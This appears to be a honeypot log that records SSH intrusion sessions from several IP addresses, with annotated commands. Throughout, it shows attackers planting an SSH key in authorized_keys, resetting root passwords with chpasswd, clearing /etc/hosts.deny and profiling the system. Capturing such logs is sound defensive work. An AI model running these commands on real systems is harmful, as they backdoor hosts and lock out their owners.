$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo "root:BH3GsBVqSsEt"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—2 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:dUTAcOwQfIVi"|chpasswd|bash
🎭 lotus_root_18 (103.105.176.70) β€” Hyderabad, India Β· 2 sessions Β· 38 cmds
2026-05-17 16:27 EDT Β· as root/hehe, root/qwe123qwe123
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo "root:QH3UtisEsB50"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—2 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:74Ow56QrkMbo"|chpasswd|bash
🎭 wraith_root_87 (60.199.224.55) β€” Taipei, Taiwan Β· 1 session Β· 19 cmds
2026-05-17 16:26 EDT Β· as root/guestuser
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:vj6vmwDrmaV5"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 burger_root_55 (43.153.41.82) β€” Santa Clara, United States Β· 2 sessions Β· 38 cmds
2026-05-17 15:53 EDT Β· as root/client123, root/root123456789
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo "root:z0qwWHzSAASh"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—2 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:t6S5u1gUCBWP"|chpasswd|bash
🎭 eagle_root_54 (43.153.3.129) β€” Santa Clara, United States Β· 1 session Β· 19 cmds
2026-05-17 15:54 EDT Β· as root/aaa
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:Qyft2xdlfD43"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 cowboy_root_51 (43.159.149.205) β€” Santa Clara, United States Β· 1 session Β· 19 cmds
2026-05-17 15:47 EDT Β· as root/_
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:zxmSo8dBdcSJ"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 dragon_root_26 (123.13.41.128) β€” Zhengzhou, China Β· 2 sessions Β· 21 cmds
2026-05-15 15:21 EDT Β· as root/linux123, root/root123456789
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:t1Jc0eKQpuvE"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 shadow_root_83 (157.20.207.165) β€” Kudus, Indonesia Β· 1 session Β· 20 cmds
2026-05-17 15:43 EDT Β· as awx/awx
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "awx\nagEP1TKSYQiC\nagEP1TKSYQiC"|passwd|bash
$ Enter new UNIX password:
$ echo "awx\nagEP1TKSYQiC\nagEP1TKSYQiC\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 cowboy_root_52 (43.153.107.215) β€” Santa Clara, United States Β· 1 session Β· 19 cmds
2026-05-17 15:41 EDT Β· as root/test!@#
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:azRHUATZiaV6"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 shadow_root_84 (223.197.248.209) β€” Central, Hong Kong Β· 3 sessions Β· 57 cmds
2026-05-17 15:17 EDT Β· as root/GBHalso98, root/Test123, root/mariah
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—3 // CPU profiling
$ echo "root:sXjPGf9gosj8"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—3 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—3 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—3
$ ls -lh $(which ls) Γ—3
$ which ls Γ—3
$ crontab -l Γ—3 // persistence setup
$ w Γ—3 // logged-in users check
$ uname -m Γ—3
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—3 // CPU profiling
$ top Γ—3 // process monitoring
$ uname Γ—3 // OS identification
$ uname -a Γ—3 // OS/kernel identification
$ whoami Γ—3 // privilege check
$ lscpu | grep Model Γ—3
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—3
$ echo "root:7yS70BBf1KhO"|chpasswd|bash
$ echo "root:CZ8BdlX1kfTH"|chpasswd|bash
🎭 burger_root_56 (43.153.76.40) β€” Santa Clara, United States Β· 3 sessions Β· 57 cmds
2026-05-17 15:15 EDT Β· as root/GBHalso98, root/Test123, root/mariah
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—3 // CPU profiling
$ echo "root:NK8AYAkn8HJc"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—3 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—3 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—3
$ ls -lh $(which ls) Γ—3
$ which ls Γ—3
$ crontab -l Γ—3 // persistence setup
$ w Γ—3 // logged-in users check
$ uname -m Γ—3
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—3 // CPU profiling
$ top Γ—3 // process monitoring
$ uname Γ—3 // OS identification
$ uname -a Γ—3 // OS/kernel identification
$ whoami Γ—3 // privilege check
$ lscpu | grep Model Γ—3
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—3
$ echo "root:DiGect4VhE80"|chpasswd|bash
$ echo "root:OqNLJeUNGJEW"|chpasswd|bash
🎭 eagle_root_55 (13.67.236.135) β€” Des Moines, United States Β· 2 sessions Β· 38 cmds
2026-05-17 15:16 EDT Β· as root/Test123, root/mariah
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo "root:R4szeIymnFgz"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—2 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:4niW3GgZH6EJ"|chpasswd|bash
🎭 cipher_root_86 (152.32.218.149) β€” Singapore, Singapore Β· 3 sessions Β· 57 cmds
2026-05-17 15:17 EDT Β· as root/GBHalso98, root/Test123, root/mariah
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—3 // CPU profiling
$ echo "root:q1LC8ds692Qn"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—3 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—3 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—3
$ ls -lh $(which ls) Γ—3
$ which ls Γ—3
$ crontab -l Γ—3 // persistence setup
$ w Γ—3 // logged-in users check
$ uname -m Γ—3
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—3 // CPU profiling
$ top Γ—3 // process monitoring
$ uname Γ—3 // OS identification
$ uname -a Γ—3 // OS/kernel identification
$ whoami Γ—3 // privilege check
$ lscpu | grep Model Γ—3
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—3
$ echo "root:5Dy3cFglPCaH"|chpasswd|bash
$ echo "root:L1s5dA2X0LCT"|chpasswd|bash
🎭 jade_root_23 (101.96.192.88) β€” Haidian, China Β· 1 session Β· 19 cmds
2026-05-17 15:15 EDT Β· as root/root123456789
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:FtbaU6vWN5QE"|chpasswd|bash
